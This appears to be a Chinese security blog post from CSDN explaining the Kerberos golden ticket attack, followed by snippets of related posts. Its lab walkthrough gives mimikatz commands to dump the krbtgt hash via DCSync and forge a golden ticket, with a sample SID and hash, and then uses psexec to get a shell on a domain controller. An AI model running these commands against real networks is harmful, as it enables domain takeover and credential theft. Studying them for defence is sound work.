PTT之黄金票据

最新推荐文章于 2024-04-15 00:48:49 发布
最新推荐文章于 2024-04-15 00:48:49 发布
阅读量251 收藏
点赞数
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58606546/article/details/121435069
版权

3.1:黄金票据原理

在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个Session key_AS和TGT,而Session key_AS并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash(也就是KDC hash),就可以伪造TGT和Session key_AS来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。因为krbtgt只有域控制器上面才有,所以使用黄金凭据意味着你之前拿到过域控制器的权限,黄金凭据可以理解为一个后门。

如下图所示,与域控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。

 

特点:不需要与AS进行交互,需要用户krbtgt的Hash

3.2:黄金票据伪造实验

***实验条件***

  • 要与DC通信
  • 域的SID 值
  • 需要krbtgt用户的hash(也就是说要拿下域控制器)

***实验环境***

角色

域控

域内客户机

系统

Windows server 2008R2

Windows 7 Sp1

IP地址

192.168.1.254

192.1681.122

第一步:客户机访问域控资源并在域控中使用mimikatz抓取krbtgt的hash

 

lsadump::dcsync /user:krbtgt

 

第二步:提取出里面的sid和NTLM hash并在win7客户端使用mimikatz制作票据

SID:S-1-5-21-1857385675-1251677193-2455287388-502

KBRTGT NTLM HASH:59034ceb8b9fa80cd755e4ab2f27c01c

kerberos::golden /admin:需要伪造的用户名 /domain:域名 /sid:sid /krbtgt:krbtgt的ntml hash /ticket:administrator.online
/ticke参数是要存储的名字,方便后面导入

 第三步:清空现有票据并将票据注入内存

 第四步:查看当前会话中票据

 第五步:权限验证

 第六步:尝试使用psexec.exe域控建立cmd交互式shell,成功获得域控cmd权限,并且是最高权限。

psexec64 \\dc.laosec.cn cmd.exe

 

一年一更
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
黄金票据原理制作与利用
G3et的博客
01-14 573
1、用域管理运行mimikatz抓取完所需的东西 ==> 再到域用户机器上运行伪造票据。2、krbtgt只存在域控上面,普通机器提权之类的无法获取到krbtgt的hash3、黄金票据可以获取任何Kerberos 服务权限,且由 krbtgt 的 hash 加密,黄金票据在使用的过程需要和域控通信****加粗样式。
Kerberos的黄金票据详解
weixin_30642267的博客
12-27 1116
0x01黄金票据的原理和条件 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与域控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。 Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的。TGT仅用...
黄金票据和白银票据
weixin_58954236的博客
10-11 259
PTH:哈希传递PTT票据传递(黄金票据和白银票据
黄金票据的原理和使用
qq_45455136的博客
09-28 1259
krbtgt用户是系统在创建域时自动生成的账号,密码是随机生成的,无法登录主机,是KDC(密钥分发中心)的服务账号。在域环境中,每个用户账号的票据都是由 krbtgt 用户所生成的 TGT票据加密使用的TGS(票据授予服务器)密码就是krbtgt用户的NTLM Hash Kerberos中的TGT和CT_SK是AS(认证服务器)返回的,TGT是由krbtgt加密和签名的,krbtgt的NTLM Hash是固定的,CT_SK不会保存在KDC中 得到krbtgt的NTLM Hash就可以伪造
黄金票据(Golden Ticket)的原理与实践
weixin_30894583的博客
07-19 2370
0、黄金票据是什么? 在与认证过程中,经过client与AS的通信会得到TGT,带着TGT想TGS请求,得到票据ticket,用这个ticket可以来访问应用服务器。如果这段有什么疑问,欢迎参考Kerberos认证协议分析。而这个黄金票据就是自己生成的TGT,在生成TGT的过程中,user、domain、timestamp、还有权限等信息会经过krbtgt(该账号不自动更新)账户hash的加密,...
域渗透之黄金票据大法 本地实验
broing55的博客
04-03 1398
黄金票据大法 图示: 黄金票据 ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户 黄金票据的条件要求: 1.域名称 hacker.com 2.域的SID 值 S-1-5-21-1854149318-4101476522-18457...
labview课件ppt_ptt_LabVIEW编程之门_
10-04
这篇课件“LabVIEW编程之门”旨在引导初学者掌握LabVIEW的基本概念和技能,通过五个主要章节深入浅出地介绍其核心功能。 **第一章:打开LabVIEW编程之门** 在这一章,你将了解LabVIEW的基础知识,包括它的用户界面...
蓝牙ptt耳机对讲协议
05-02
蓝牙ptt对讲耳机,可以扩展普通手机为行业对讲耳机。适合在行业内对讲与其他业务的整合
PTT-Crawler:专用于PTT网站的网络爬虫
04-30
PTT Crawler一个练习网路爬虫的小实验,可以取出PTT 文章中标题、内容与推文。使用方式批量爬取crawler = PttCrawler ()crawler . crawl ( board = "欲爬取的看版名稱" , start = StartIndex , end = EndIndex ) ...
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
攻击者可以创建Golden Ticket(黄金票据)和Silver Ticket(白银票据)来模拟合法的Kerberos票证,以此提升权限。Golden Ticket是伪造的TGT,允许攻击者长时间保持权限;而Silver Ticket则是针对特定服务的伪造TGS...
黄金票据的制作与使用
热门推荐
Shanfenglan's blog
08-27 24万+
原理 黄金票据的原理就是用krbtgt的hash来伪造TGT的内容。更改里面的client参数与session key等。让TGS以为我就是那个我所声称的人,当然我一般会声称自己是administrator。第四步主要是来验证客户端的身份。 所谓的黄金票据其实就是kerberos认证的第二个阶段中的tgs的ticket也就是TGT。这个ticket相当于对请求端的一个身份认证的凭据,如果可以伪造这个ticket,那么就可以伪造任意身份,而黄金票据就是一个实现方式。 kerberos协议原理请参考:NTML认
域渗透:黄金票据
ClarkAlbert的博客
10-29 1561
域渗透:黄金票据前言:1.黄金票据的原理和条件(1)原理(2)条件2.黄金票据的局限性3.绕过黄金票据局限性4.黄金票据的特点5.黄金票据防御6.实践 前言: 在了解黄金票据前,首先要清楚keberos协议,目前在windows域中采用的认证协议就是kerberos。(参考链接:https://blog.csdn.net/wy_97/article/details/87649262) 1.黄金票据的原理和条件 (1)原理 黄金票据伪造的是票据授予票据(TGT),TGT=krbtgt hash(session
内网渗透-(黄金票据和白银票据)详解(一)
duoba_an的博客
03-31 1662
在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。获取Client的sid,以及所在的组,再根据该服务的ACL,判断Client是否有访问服务的权限,到此完成整个认证流程(大多数服务并没有验证PAC这一步)。这个是启用PAC支持的扩展。
内网渗透--Golden Ticket(黄金票据)制作&利用
qq_62169455的博客
01-17 1396
伪造TGT,不需要和KDC进行校验,金票可以直接在本地生成,在域内机器和非域内机器都可以使用。
「运维有小邓」AD域常见攻击之——黄金票据
运维有小邓
03-28 2521
“Golden Ticket Attack(黄金票据)”是一个特别丰富多彩的(如果你会原谅双关语)名称,用于特别危险的攻击。这个绰号来自罗尔德·达尔(Roald Dahl)的书 查理和巧克力工厂, 其中一张金票是令人梦寐以求的通行证,可以让其所有者进入威利旺卡戒备森严的糖果工厂。同样,成功的Golden Ticket(黄金票据) 攻击使黑客能够访问组织的整个 Active Directory 域。
内网渗透:三、Kerberos协议及票据黄金和白银)伪造
liu_jia_liang的博客
02-20 3540
一、Kerberos协议 kerberos(Secure network authentication system)中文叫网络安全认证系统 kerberos在进行认证过程中并不会传输用户的密码,而是通过传输tickets(票据)进行认证登陆到LDAP server。Kerberos协议主要用于计算机网络的身份鉴别,其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的凭证(ticket-granting-ticket)访问多个服务,即SSO(Single Sign On)。由于在每个Client和S
域权限维持—黄金票据和白金票
最新发布
lza20001103的博客
04-15 619
域权限维持—黄金票据和白金票
黄金票据制作原理及利用方式
Happy峰
09-23 2742
Golden Ticket黄金票据制作原理及利用方式 Krbtgt账户介绍 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机 黄金票据原理 TGT=Krbtgt的html hash 加密 1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的 ,TGP它是由Krbtgt加密和签名的 ,krbtgt的NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。 2、所以只要得到krbtgt
内网安全:PTH、PTK与PTT哈希票据攻击策略解析
MS14-068允许攻击者获取具有更高权限的Golden Ticket(黄金票据)和Silver Ticket(白银票据),这些技术主要用来维持攻击者的权限并绕过正常认证流程。 6. **MS14-068漏洞影响**: 这个漏洞使得域内攻击者能够获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值